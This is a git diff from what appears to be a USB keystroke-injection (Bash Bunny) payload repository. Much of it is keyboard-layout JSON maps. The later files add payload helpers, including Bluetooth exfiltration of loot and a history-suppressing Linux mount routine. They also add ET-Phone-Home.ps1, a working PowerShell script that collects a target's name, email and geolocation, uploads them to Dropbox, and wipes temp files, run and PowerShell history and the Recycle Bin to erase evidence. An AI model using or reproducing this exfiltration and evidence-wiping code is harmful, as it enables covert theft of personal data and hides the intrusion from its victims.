"+":"20,00,1e",
"\"":"20,00,1f",
"*":"20,00,20",
"%":"20,00,22",
"&":"20,00,23",
"/":"20,00,24",
"(":"20,00,25",
")":"20,00,26",
"=":"20,00,27",
"?":"20,00,2d",
"`":"20,00,2e",
"!":"20,00,30",
";":"20,00,36",
":":"20,00,37",
"_":"20,00,38",
">":"20,00,64",
"°":"02,00,35",
"°":"20,00,35",
"§":"00,00,35",
"ç":"02,00,21",
"ç":"20,00,21",
"¬":"40,00,23",
"¦":"40,00,1e",
"¢":"40,00,25",
"´":"40,00,2d",
"BACKSPACE":"00,00,2a",
"SHIFT-BACKSPACE":"02,00,2a",
"SHIFT-BACKSPACE":"20,00,2a",
"€":"40,00,08",
"è":"02,00,2f",
"è":"20,00,2f",
"ü":"00,00,2f",
"¨":"00,00,30",
"é":"02,00,33",
"é":"20,00,33",
"ö":"00,00,33",
"ä":"00,00,34",
"à":"02,00,34",
"à":"20,00,34",
"£":"02,00,32",
"£":"20,00,32",
"ALT-GR":"40,00,00",
"RIGHTCONTROL":"10,00,00",
"NUMLOCK":"00,00,53",
"+":"00,00,57",
"-":"00,00,56",
"*":"00,00,55",
"/":"00,00,54",
"ENTER":"00,00,58",
"DEL":"00,00,63",
"INSERT":"00,00,62",
"END":"00,00,59",
"DOWN":"00,00,5a",
"PAGEDOWN":"00,00,5b",
"LEFT":"00,00,5c",
"RIGHT":"00,00,5e",
"HOME":"00,00,5f",
"UP":"00,00,60",
"PAGEUP":"00,00,61",
".":"00,00,63",
"0":"00,00,62",
"1":"00,00,59",
"2":"00,00,5a",
"3":"00,00,5b",
"4":"00,00,5c",
"5":"00,00,5d",
"6":"00,00,5e",
"7":"00,00,5f",
"8":"00,00,60",
"9":"00,00,61"
}

2
languages/es-la.json
View File

@ -144,7 +144,7 @@
"/":"02,00,24",
"(":"02,00,25",
")":"02,00,26",
")":"02,00,27",
"=":"02,00,27",
"?":"02,00,2d",
"¡":"02,00,2e",
"¨":"02,00,2f",

38
languages/gb.json
View File

@ -56,6 +56,7 @@
"ENTER":"00,00,28",
"ESC":"00,00,29",
"ESCAPE":"00,00,29",
"BACKSPACE":"00,00,2a",
"TAB":"00,00,2b",
" ":"00,00,2c",
"SPACE":"00,00,2c",
@ -64,6 +65,7 @@
"[":"00,00,2f",
"]":"00,00,30",
"#":"00,00,31",
"__comment":"MIA K42 00,00,32",
";":"00,00,33",
"'":"00,00,34",
"`":"00,00,35",
@ -102,10 +104,26 @@
"DOWNARROW":"00,00,51",
"UP":"00,00,52",
"UPARROW":"00,00,52",
"NUMLOCK":"00,00,53",
"KPAD_SLASH":"00,00,54",
"KPAD_ASTERISK":"00,00,55",
"KPAD_MINUS":"00,00,56",
"KPAD_PLUS":"00,00,57",
"KPAD_ENTER":"00,00,58",
"KPAD_1":"00,00,59",
"KPAD_2":"00,00,5a",
"KPAD_3":"00,00,5b",
"KPAD_4":"00,00,5c",
"KPAD_5":"00,00,5d",
"KPAD_6":"00,00,5e",
"KPAD_7":"00,00,5f",
"KPAD_8":"00,00,60",
"KPAD_9":"00,00,61",
"KPAD_0":"00,00,62",
"KPAD_DOT":"00,00,63",
"\\":"00,00,64",
"APP":"00,00,65",
"MENU":"00,00,65",
"ALT-TAB":"00,00,71",
"CONTROL":"01,00,00",
"CTRL":"01,00,00",
"SHIFT":"02,00,00",
@ -137,6 +155,7 @@
"Z":"02,00,1d",
"!":"02,00,1e",
"\"":"02,00,1f",
"£":"02,00,20",
"$":"02,00,21",
"%":"02,00,22",
"^":"02,00,23",
@ -151,19 +170,26 @@
"~":"02,00,31",
":":"02,00,33",
"@":"02,00,34",
"¬":"02,00,35",
"<":"02,00,36",
">":"02,00,37",
"?":"02,00,38",
"|":"02,00,64",
"CTRL-SHIFT":"03,00,00",
"ALT":"04,00,00",
"ALT-TAB":"04,00,2b",
"CTRL-ALT":"05,00,00",
"ALT-SHIFT":"06,00,00",
"COMMAND":"08,00,00",
"GUI":"08,00,00",
"WINDOWS":"08,00,00",
"COMMAND-OPTION":"12,00,00",
"COMMAND-CTRL-SHIFT":"12,00,00",
"COMMAND-CTRL":"12,00,00",
"COMMAND-OPTION-SHIFT'":"12,00,00"
"COMMAND":"08,00,00",
"COMMAND-CTRL":"09,00,00",
"COMMAND-CTRL-SHIFT":"0b,00,00",
"COMMAND-OPTION":"0c,00,00",
"COMMAND-OPTION-SHIFT'":"0e,00,00",
"ALTGR":"40,00,00",
"ALTGR-TAB":"40,00,2b",
"¦":"40,00,35",
"CTRL-ALTGR":"41,00,00",
"ALTGR-SHIFT":"42,00,00"
}

187
languages/hu.json Normal file
View File

@ -0,0 +1,187 @@
{
"__comment":"All numbers here are in hex format and 0x is ignored.",
"__comment":" ",
"__comment":"This list is in ascending order of 3rd byte (HID Usage ID).",
"__comment":" See section 10 Keyboard/Keypad Page (0x07)",
"__comment":" of document USB HID Usage Tables Version 1.12.",
"__comment":" ",
"__comment":"Definition of these 3 bytes can be found",
"__comment":" in section B.1 Protocol 1 (Keyboard)",
"__comment":" of document Device Class Definition for HID Version 1.11",
"__comment":" - byte 1: Modifier keys",
"__comment":" - byte 2: Reserved",
"__comment":" - byte 3: Keycode 1",
"__comment":" ",
"__comment":"Both documents can be obtained from link here",
"__comment":" http://www.usb.org/developers/hidpage/",
"__comment":" ",
"__comment":" Hungarian QWERTZ language made by Skeleton022",
"__comment":" Added áéíóöőúüűÁÉÍÓÖŐÚÜŰ",
"a":"00,00,04",
"b":"00,00,05",
"c":"00,00,06",
"d":"00,00,07",
"e":"00,00,08",
"f":"00,00,09",
"g":"00,00,0a",
"h":"00,00,0b",
"i":"00,00,0c",
"j":"00,00,0d",
"k":"00,00,0e",
"l":"00,00,0f",
"m":"00,00,10",
"n":"00,00,11",
"o":"00,00,12",
"p":"00,00,13",
"q":"00,00,14",
"r":"00,00,15",
"s":"00,00,16",
"t":"00,00,17",
"u":"00,00,18",
"v":"00,00,19",
"w":"00,00,1a",
"x":"00,00,1b",
"z":"00,00,1c",
"y":"00,00,1d",
"1":"00,00,1e",
"2":"00,00,1f",
"3":"00,00,20",
"4":"00,00,21",
"5":"00,00,22",
"6":"00,00,23",
"7":"00,00,24",
"8":"00,00,25",
"9":"00,00,26",
"ö":"00,00,27",
"ENTER":"00,00,28",
"ESC":"00,00,29",
"ESCAPE":"00,00,29",
"TAB":"00,00,2b",
" ":"00,00,2c",
"SPACE":"00,00,2c",
"ü":"00,00,2d",
"ó":"00,00,2e",
"ő":"00,00,2f",
"ú":"00,00,30",
"ű":"00,00,31",
"é":"00,00,33",
"á":"00,00,34",
"0":"00,00,35",
",":"00,00,36",
".":"00,00,37",
"-":"00,00,38",
"CAPSLOCK":"00,00,39",
"F1":"00,00,3a",
"F2":"00,00,3b",
"F3":"00,00,3c",
"F4":"00,00,3d",
"F5":"00,00,3e",
"F6":"00,00,3f",
"F7":"00,00,40",
"F8":"00,00,41",
"F9":"00,00,42",
"F10":"00,00,43",
"F11":"00,00,44",
"F12":"00,00,45",
"PRINTSCREEN":"00,00,46",
"SCROLLLOCK":"00,00,47",
"BREAK":"00,00,48",
"PAUSE":"00,00,48",
"INSERT":"00,00,49",
"HOME":"00,00,4a",
"PAGEUP":"00,00,4b",
"DEL":"00,00,4c",
"DELETE":"00,00,4c",
"END":"00,00,4d",
"PAGEDOWN":"00,00,4e",
"RIGHT":"00,00,4f",
"RIGHTARROW":"00,00,4f",
"LEFT":"00,00,50",
"LEFTARROW":"00,00,50",
"DOWN":"00,00,51",
"DOWNARROW":"00,00,51",
"UP":"00,00,52",
"UPARROW":"00,00,52",
"í":"00,00,64",
"APP":"00,00,65",
"MENU":"00,00,65",
"ALT-TAB":"00,00,71",
"CONTROL":"01,00,00",
"CTRL":"01,00,00",
"SHIFT":"02,00,00",
"A":"02,00,04",
"B":"02,00,05",
"C":"02,00,06",
"D":"02,00,07",
"E":"02,00,08",
"F":"02,00,09",
"G":"02,00,0a",
"H":"02,00,0b",
"I":"02,00,0c",
"J":"02,00,0d",
"K":"02,00,0e",
"L":"02,00,0f",
"M":"02,00,10",
"N":"02,00,11",
"O":"02,00,12",
"P":"02,00,13",
"Q":"02,00,14",
"R":"02,00,15",
"S":"02,00,16",
"T":"02,00,17",
"U":"02,00,18",
"V":"02,00,19",
"W":"02,00,1a",
"X":"02,00,1b",
"Z":"02,00,1c",
"Y":"02,00,1d",
"'":"02,00,1e",
"\"":"02,00,1f",
"+":"02,00,20",
"!":"02,00,21",
"%":"02,00,22",
"/":"02,00,23",
"=":"02,00,24",
"(":"02,00,25",
")":"02,00,26",
"Ö":"02,00,27",
"Ü":"02,00,2d",
"Ó":"02,00,2e",
"Ő":"02,00,2f",
"Ú":"02,00,30",
"Ű":"02,00,31",
"É":"02,00,33",
"Á":"02,00,34",
"?":"02,00,36",
":":"02,00,37",
"_":"02,00,38",
"Í":"02,00,64",
"CTRL-SHIFT":"03,00,00",
"ALT":"04,00,00",
"CTRL-ALT":"05,00,00",
"ALT-SHIFT":"06,00,00",
"COMMAND":"08,00,00",
"GUI":"08,00,00",
"WINDOWS":"08,00,00",
"COMMAND-OPTION":"12,00,00",
"COMMAND-CTRL-SHIFT":"12,00,00",
"COMMAND-CTRL":"12,00,00",
"COMMAND-OPTION-SHIFT'":"12,00,00",
"{":"40,00,05",
"&":"40,00,06",
"[":"40,00,09",
"]":"40,00,0a",
"}":"40,00,11",
"\\":"40,00,14",
"@":"40,00,19",
"|":"40,00,1a",
"#":"40,00,1b",
">":"40,00,1d",
"~":"40,00,1e",
"^":"40,00,20",
"`":"40,00,24",
"$":"40,00,33",
";":"40,00,36",
"*":"40,00,38",
"<":"40,00,64"
}

172
languages/jp.json Normal file
View File

@ -0,0 +1,172 @@
{
"__comment": "All numbers here are in hex format and 0x is ignored.",
"__comment": " ",
"__comment": "This list is in ascending order of 3rd byte (HID Usage ID).",
"__comment": " See section 10 Keyboard/Keypad Page (0x07)",
"__comment": " of document USB HID Usage Tables Version 1.12.",
"__comment": " ",
"__comment": "Definition of these 3 bytes can be found",
"__comment": " in section B.1 Protocol 1 (Keyboard)",
"__comment": " of document Device Class Definition for HID Version 1.11",
"__comment": " - byte 1: Modifier keys",
"__comment": " - byte 2: Reserved",
"__comment": " - byte 3: Keycode 1",
"__comment": " ",
"__comment": "Both documents can be obtained from link here",
"__comment": " http://www.usb.org/developers/hidpage/",
"__comment": " ",
"__comment": "A = LeftShift + a, { = LeftShift + [",
"__comment": " ",
"CTRL": "01,00,00",
"CONTROL": "01,00,00",
"SHIFT": "02,00,00",
"ALT": "04,00,00",
"GUI": "08,00,00",
"WINDOWS": "08,00,00",
"CTRL-ALT": "05,00,00",
"CTRL-SHIFT": "03,00,00",
"ALT-SHIFT": "06,00,00",
"__comment": "Below 5 key combinations are for Mac OSX",
"__comment": "Example: (COMMAND-OPTION SHIFT t) to open terminal",
"COMMAND": "08,00,00",
"COMMAND-CTRL": "09,00,00",
"COMMAND-CTRL-SHIFT": "0B,00,00",
"COMMAND-OPTION": "0C,00,00",
"COMMAND-OPTION-SHIFT": "0E,00,00",
"a": "00,00,04",
"A": "02,00,04",
"b": "00,00,05",
"B": "02,00,05",
"c": "00,00,06",
"C": "02,00,06",
"d": "00,00,07",
"D": "02,00,07",
"e": "00,00,08",
"E": "02,00,08",
"f": "00,00,09",
"F": "02,00,09",
"g": "00,00,0a",
"G": "02,00,0a",
"h": "00,00,0b",
"H": "02,00,0b",
"i": "00,00,0c",
"I": "02,00,0c",
"j": "00,00,0d",
"J": "02,00,0d",
"k": "00,00,0e",
"K": "02,00,0e",
"l": "00,00,0f",
"L": "02,00,0f",
"m": "00,00,10",
"M": "02,00,10",
"n": "00,00,11",
"N": "02,00,11",
"o": "00,00,12",
"O": "02,00,12",
"p": "00,00,13",
"P": "02,00,13",
"q": "00,00,14",
"Q": "02,00,14",
"r": "00,00,15",
"R": "02,00,15",
"s": "00,00,16",
"S": "02,00,16",
"t": "00,00,17",
"T": "02,00,17",
"u": "00,00,18",
"U": "02,00,18",
"v": "00,00,19",
"V": "02,00,19",
"w": "00,00,1a",
"W": "02,00,1a",
"x": "00,00,1b",
"X": "02,00,1b",
"y": "00,00,1c",
"Y": "02,00,1c",
"z": "00,00,1d",
"Z": "02,00,1d",
"1": "00,00,1e",
"!": "02,00,1e",
"2": "00,00,1f",
"\"": "02,00,1f",
"3": "00,00,20",
"#": "02,00,20",
"4": "00,00,21",
"$": "02,00,21",
"5": "00,00,22",
"%": "02,00,22",
"6": "00,00,23",
"&": "02,00,23",
"7": "00,00,24",
"'": "02,00,24",
"8": "00,00,25",
"(": "02,00,25",
"9": "00,00,26",
")": "02,00,26",
"0": "00,00,27",
"ENTER": "00,00,28",
"ESC": "00,00,29",
"ESCAPE": "00,00,29",
"BACKSPACE": "00,00,2a",
"TAB": "00,00,2b",
"ALT-TAB": "04,00,2b",
"SPACE": "00,00,2c",
" ": "00,00,2c",
"-": "00,00,2d",
"=": "02,00,2d",
"^": "00,00,2e",
"~": "02,00,2e",
"@": "00,00,2f",
"`": "02,00,2f",
"[": "00,00,30",
"{": "02,00,30",
"\\": "00,00,31",
"|": "02,00,31",
"]": "00,00,32",
"}": "02,00,32",
";": "00,00,33",
"+": "02,00,33",
":": "00,00,34",
"*": "02,00,34",
",": "00,00,36",
"<": "02,00,36",
".": "00,00,37",
">": "02,00,37",
"/": "00,00,38",
"?": "02,00,38",
"CAPSLOCK": "00,00,39",
"F1": "00,00,3a",
"F2": "00,00,3b",
"F3": "00,00,3c",
"F4": "00,00,3d",
"F5": "00,00,3e",
"F6": "00,00,3f",
"F7": "00,00,40",
"F8": "00,00,41",
"F9": "00,00,42",
"F10": "00,00,43",
"F11": "00,00,44",
"F12": "00,00,45",
"PRINTSCREEN":"00,00,46",
"SCROLLLOCK": "00,00,47",
"PAUSE": "00,00,48",
"BREAK": "00,00,48",
"INSERT": "00,00,49",
"HOME": "00,00,4a",
"PAGEUP": "00,00,4b",
"DELETE": "00,00,4c",
"DEL": "00,00,4c",
"END": "00,00,4d",
"PAGEDOWN": "00,00,4e",
"RIGHTARROW": "00,00,4f",
"RIGHT": "00,00,4f",
"LEFTARROW": "00,00,50",
"LEFT": "00,00,50",
"DOWNARROW": "00,00,51",
"DOWN": "00,00,51",
"UPARROW": "00,00,52",
"UP": "00,00,52",
"NUMLOCK": "00,00,53",
"MENU": "00,00,65",
"APP": "00,00,65"
}

6
languages/no.json
View File

@ -43,6 +43,9 @@
"x":"00,00,1b",
"y":"00,00,1c",
"z":"00,00,1d",
"æ":"00,00,34",
"ø":"00,00,33",
"å":"00,00,2f",
"1":"00,00,1e",
"2":"00,00,1f",
"3":"00,00,20",
@ -131,6 +134,9 @@
"X":"02,00,1b",
"Y":"02,00,1c",
"Z":"02,00,1d",
"Æ":"02,00,34",
"Ø":"02,00,33",
"Å":"02,00,2f",
"!":"02,00,1e",
"\"":"02,00,1f",
"#":"02,00,20",

173
languages/tr.json Normal file
View File

@ -0,0 +1,173 @@
{
"__comment": "All numbers here are in hex format and 0x is ignored.",
"__comment": " ",
"__comment": "This list is in ascending order of 3rd byte (HID Usage ID).",
"__comment": " See section 10 Keyboard/Keypad Page (0x07)",
"__comment": " of document USB HID Usage Tables Version 1.12.",
"__comment": " ",
"__comment": "Definition of these 3 bytes can be found",
"__comment": " in section B.1 Protocol 1 (Keyboard)",
"__comment": " of document Device Class Definition for HID Version 1.11",
"__comment": " - byte 1: Modifier keys",
"__comment": " - byte 2: Reserved",
"__comment": " - byte 3: Keycode 1",
"__comment": " ",
"__comment": "Both documents can be obtained from link here",
"__comment": " http://www.usb.org/developers/hidpage/",
"__comment": " ",
"__comment": "A = LeftShift + a, { = LeftShift + [",
"__comment": " ",
"CTRL": "01,00,00",
"CONTROL": "01,00,00",
"SHIFT": "02,00,00",
"ALT": "04,00,00",
"GUI": "08,00,00",
"WINDOWS": "08,00,00",
"CTRL-ALT": "05,00,00",
"CTRL-SHIFT": "03,00,00",
"ALT-SHIFT": "06,00,00",
"__comment": "Below 5 key combinations are for Mac OSX",
"__comment": "Example: (COMMAND-OPTION SHIFT t) to open terminal",
"COMMAND": "08,00,00",
"COMMAND-CTRL": "09,00,00",
"COMMAND-CTRL-SHIFT": "0B,00,00",
"COMMAND-OPTION": "0C,00,00",
"COMMAND-OPTION-SHIFT": "0E,00,00",
"a": "00,00,04",
"A": "02,00,04",
"b": "00,00,05",
"B": "02,00,05",
"c": "00,00,06",
"C": "02,00,06",
"d": "00,00,07",
"D": "02,00,07",
"e": "00,00,08",
"E": "02,00,08",
"f": "00,00,09",
"F": "02,00,09",
"g": "00,00,0a",
"G": "02,00,0a",
"h": "00,00,0b",
"H": "02,00,0b",
"i": "00,00,34",
"I": "02,00,0c",
"j": "00,00,0d",
"J": "02,00,0d",
"k": "00,00,0e",
"K": "02,00,0e",
"l": "00,00,0f",
"L": "02,00,0f",
"m": "00,00,10",
"M": "02,00,10",
"n": "00,00,11",
"N": "02,00,11",
"o": "00,00,12",
"O": "02,00,12",
"p": "00,00,13",
"P": "02,00,13",
"q": "00,00,14",
"Q": "02,00,14",
"r": "00,00,15",
"R": "02,00,15",
"s": "00,00,16",
"S": "02,00,16",
"t": "00,00,17",
"T": "02,00,17",
"u": "00,00,18",
"U": "02,00,18",
"v": "00,00,19",
"V": "02,00,19",
"w": "00,00,1a",
"W": "02,00,1a",
"x": "00,00,1b",
"X": "02,00,1b",
"y": "00,00,1c",
"Y": "02,00,1c",
"z": "00,00,1d",
"Z": "02,00,1d",
"1": "00,00,1e",
"!": "02,00,1e",
"2": "00,00,1f",
"@": "40,00,14",
"3": "00,00,20",
"#": "40,00,20",
"4": "00,00,21",
"$": "40,00,21",
"5": "00,00,22",
"%": "02,00,22",
"6": "00,00,23",
"^": "02,00,20",
"7": "00,00,24",
"&": "02,00,23",
"8": "00,00,25",
"*": "00,00,2d",
"9": "00,00,26",
"(": "02,00,25",
"0": "00,00,27",
")": "02,00,26",
"ENTER": "00,00,28",
"ESC": "00,00,29",
"ESCAPE": "00,00,29",
"BACKSPACE": "00,00,2a",
"TAB": "00,00,2b",
"ALT-TAB": "04,00,2b",
"SPACE": "00,00,2c",
" ": "00,00,2c",
"-": "00,00,2e",
"_": "02,00,2e",
"=": "02,00,27",
"+": "02,00,21",
"[": "40,00,25",
"{": "40,00,24",
"]": "40,00,26",
"}": "40,00,27",
"\\": "40,00,2d",
"|": "40,00,2e",
";": "02,00,31",
":": "02,00,38",
"'": "02,00,1f",
"\"": "00,00,35",
"`": "40,00,31",
"~": "40,00,30",
",": "00,00,31",
"<": "40,00,35",
".": "00,00,38",
">": "40,00,1e",
"/": "02,00,24",
"?": "02,00,2d",
"CAPSLOCK": "00,00,39",
"F1": "00,00,3a",
"F2": "00,00,3b",
"F3": "00,00,3c",
"F4": "00,00,3d",
"F5": "00,00,3e",
"F6": "00,00,3f",
"F7": "00,00,40",
"F8": "00,00,41",
"F9": "00,00,42",
"F10": "00,00,43",
"F11": "00,00,44",
"F12": "00,00,45",
"PRINTSCREEN":"00,00,46",
"SCROLLLOCK": "00,00,47",
"PAUSE": "00,00,48",
"BREAK": "00,00,48",
"INSERT": "00,00,49",
"HOME": "00,00,4a",
"PAGEUP": "00,00,4b",
"DELETE": "00,00,4c",
"DEL": "00,00,4c",
"END": "00,00,4d",
"PAGEDOWN": "00,00,4e",
"RIGHTARROW": "00,00,4f",
"RIGHT": "00,00,4f",
"LEFTARROW": "00,00,50",
"LEFT": "00,00,50",
"DOWNARROW": "00,00,51",
"DOWN": "00,00,51",
"UPARROW": "00,00,52",
"UP": "00,00,52",
"NUMLOCK": "00,00,53",
"MENU": "00,00,65",
"APP": "00,00,65"
}

16
payloads/extensions/ble_exfil.sh Normal file
View File

@ -0,0 +1,16 @@
#!/bin/bash
#
# BLE_EXFIL v1 by @drapl0n
# Exfiltrate data(25 bytes) stored in "/loot/ble_exfil.txt" via BLE.
# Usage: BLE_EXFIL
function BLE_EXFIL() {
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
sleep 1
text=$(cat /root/udisk/loot/ble_exfil.txt)
exfil=${text:0:25}
echo -n -e "AT+ADVDAT=$exfil" > /dev/ttyS1
}
export -f BLE_EXFIL

4
payloads/extensions/get.sh
View File

@ -26,6 +26,10 @@ function GET() {
[[ "${ScanForOS,,}" == *"linux"* ]] && export TARGET_OS='LINUX' && return
export TARGET_OS='UNKNOWN'
;;
"BB_LABEL")
export BB_LABEL=$(ls -l /dev/disk/by-label/ | awk '/nandf$/ { print $9 }')
;;
esac
}

30
payloads/extensions/linux_mount.sh Normal file
View File

@ -0,0 +1,30 @@
#!/bin/bash
#
# LINUX_MOUNT v1 by @drapl0n
# Auto mounts BashBunny on GNU/Linux systems.
# NOTE: Mount path is stored in variable "lmnt".
# Usage: LINUX_MOUNT - to automatically mount BashBunny.
# LINUX_UMOUNT - to unmount mounted BashBunny.
function LINUX_MOUNT() {
Q CTRL-ALT t
Q DELAY 1000
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
Q STRING disk='$(lsblk -fs | grep BashBunny | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
Q STRING udisksctl mount -b /dev/'$disk'
Q ENTER
Q DELAY 2000
Q STRING lmnt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
}
function LINUX_UMOUNT() {
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 1000
}
export -f LINUX_MOUNT LINUX_UMOUNT

43
payloads/extensions/wait.sh
View File

@ -1,9 +1,8 @@
#!/bin/bash
#
# WAIT v1 by @Hak5Darren
# Waits blocks the payload from continuing until the switch position has changed
# Pauses payload until the switch position has changed
# Usage: WAIT
function WAIT() {
GET SWITCH_POSITION
TEST=$SWITCH_POSITION
@ -13,5 +12,43 @@ function WAIT() {
sleep 1
done
}
export -f WAIT
# WAIT_FOR_LOOT v1 by Korben
# WAIT_FOR_LOOT <file_path> (optional)<refresh interval in seconds>
#
# Example: WAIT_FOR_LOOT /root/loot/captured_keys.txt
# Will return once /root/loot/captured_keys.txt exists
# OR IF FILE ALREADY EXISTS
# Will return once the file line count has increased
function WAIT_FOR_LOOT() {
# Check for refresh interval override
if [ -z "${2}" ]; then
REFRESH_INTERVAL=1
else
REFRESH_INTERVAL=$2
fi
if [ -f "${1}" ]; then
# If file already exists wait for it to change size
start_count=$(cat $1|wc -l)
while [ $(cat $1|wc -l) -eq $start_count ]; do
sleep $REFRESH_INTERVAL
done
else
# File doesn't exist, wait for it to be created
while [ ! -f "${1}" ]; do
sleep $REFRESH_INTERVAL
done
fi
}
export -f WAIT_FOR_LOOT
# WAIT_FOR_TARGET_IP v1 by Hak5Darren
# Pauses payload until target receives IP address
function WAIT_FOR_TARGET_IP() {
until [ ! -z $(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq) ]; do sleep 1; done
}
export -f WAIT_FOR_TARGET_IP

23
payloads/extensions/wait_for_notpresent.sh Executable file
View File

@ -0,0 +1,23 @@
#!/bin/bash
#
# WAIT_FOR_NOTPRESENT v1 by @Hak5Darren
# Pauses payload execution until specified bluetooth identifier IS NOT present
# Usage: WAIT_FOR_NOTPRESENT devicename
function WAIT_FOR_NOTPRESENT() {
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
sleep 1
echo -n -e "AT+ROLE=2" > /dev/ttyS1
echo -n -e "AT+RESET" > /dev/ttyS1
while true; do
timeout 5s cat /dev/ttyS1 > /tmp/bt_observation
if grep -qao $1 /tmp/bt_observation; then
echo "$1 found"
else
break
fi
done
}
export -f WAIT_FOR_NOTPRESENT

23
payloads/extensions/wait_for_present.sh Executable file
View File

@ -0,0 +1,23 @@
#!/bin/bash
#
# WAIT_FOR_PRESENT v1 by @Hak5Darren
# Pauses payload execution until specified bluetooth identifier IS present
# Usage: WAIT_FOR_PRESENT devicename
function WAIT_FOR_PRESENT() {
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
sleep 1
echo -n -e "AT+ROLE=2" > /dev/ttyS1
echo -n -e "AT+RESET" > /dev/ttyS1
while true; do
timeout 5s cat /dev/ttyS1 > /tmp/bt_observation
if grep -qao $1 /tmp/bt_observation; then
break
else
echo "$1 not found"
fi
done
}
export -f WAIT_FOR_PRESENT

154
payloads/library/Incident_Response/-BB-ET-Phone-Home/ET-Phone-Home.ps1 Normal file
View File

@ -0,0 +1,154 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : ET-Phone-Home | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Incident-Response | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.SYNOPSIS
This script is meant to recover your device or as an advanced recon tactic to get sensitive info on your target
.DESCRIPTION
This program is used to locate your stolen cable. Or perhaps locate your "stolen" cable if you left it as bait.
This script will get the Name and email associated with the targets microsoft account
Their geo-location will also be grabbed giving you the latitude and longitude of where your device was activated
#>
#------------------------------------------------------------------------------------------------------------------------------------
$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_Device-Location.txt"
# Your dropbox access token to exfiltrate information to
$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN"
#------------------------------------------------------------------------------------------------------------------------------------
function Get-fullName {
try {
$fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
}
# If no name is detected function will return $env:UserName
# Write Error is just for troubleshooting
catch {Write-Error "No name was detected"
return $env:UserName
-ErrorAction SilentlyContinue
}
return $fullName
}
$FN = Get-fullName
#------------------------------------------------------------------------------------------------------------------------------------
function Get-email {
try {
$email = GPRESULT -Z /USER $Env:username | Select-String -Pattern "([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})" -AllMatches;$email = ("$email").Trim()
return $email
}
# If no email is detected function will return backup message for sapi speak
# Write Error is just for troubleshooting
catch {Write-Error "An email was not found"
return "No Email Detected"
-ErrorAction SilentlyContinue
}
}
$EM = Get-email
#------------------------------------------------------------------------------------------------------------------------------------
function Get-GeoLocation{
try {
Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace
$GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object
$GeoWatcher.Start() #Begin resolving current locaton
while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
Start-Sleep -Milliseconds 100 #Wait for discovery.
}
if ($GeoWatcher.Permission -eq 'Denied'){
Write-Error 'Access Denied for Location Information'
} else {
$GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results.
}
}
# Write Error is just for troubleshooting
catch {Write-Error "No coordinates found"
return "No Coordinates found"
-ErrorAction SilentlyContinue
}
}
$GL = Get-GeoLocation
#------------------------------------------------------------------------------------------------------------------------------------
echo $FN >> $env:TMP\$FileName
echo $EM >> $env:TMP\$FileName
echo $GL >> $env:TMP\$FileName
#------------------------------------------------------------------------------------------------------------------------------------
# Upload output file to dropbox
$TargetFilePath="/$FileName"
$SourceFilePath="$env:TMP\$FileName"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
#------------------------------------------------------------------------------------------------------------------------------------
<#
.NOTES
This is to clean up behind you and remove any evidence to prove you were there
#>
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue

117
payloads/library/Incident_Response/-BB-ET-Phone-Home/README.md Normal file
View File

@ -0,0 +1,117 @@
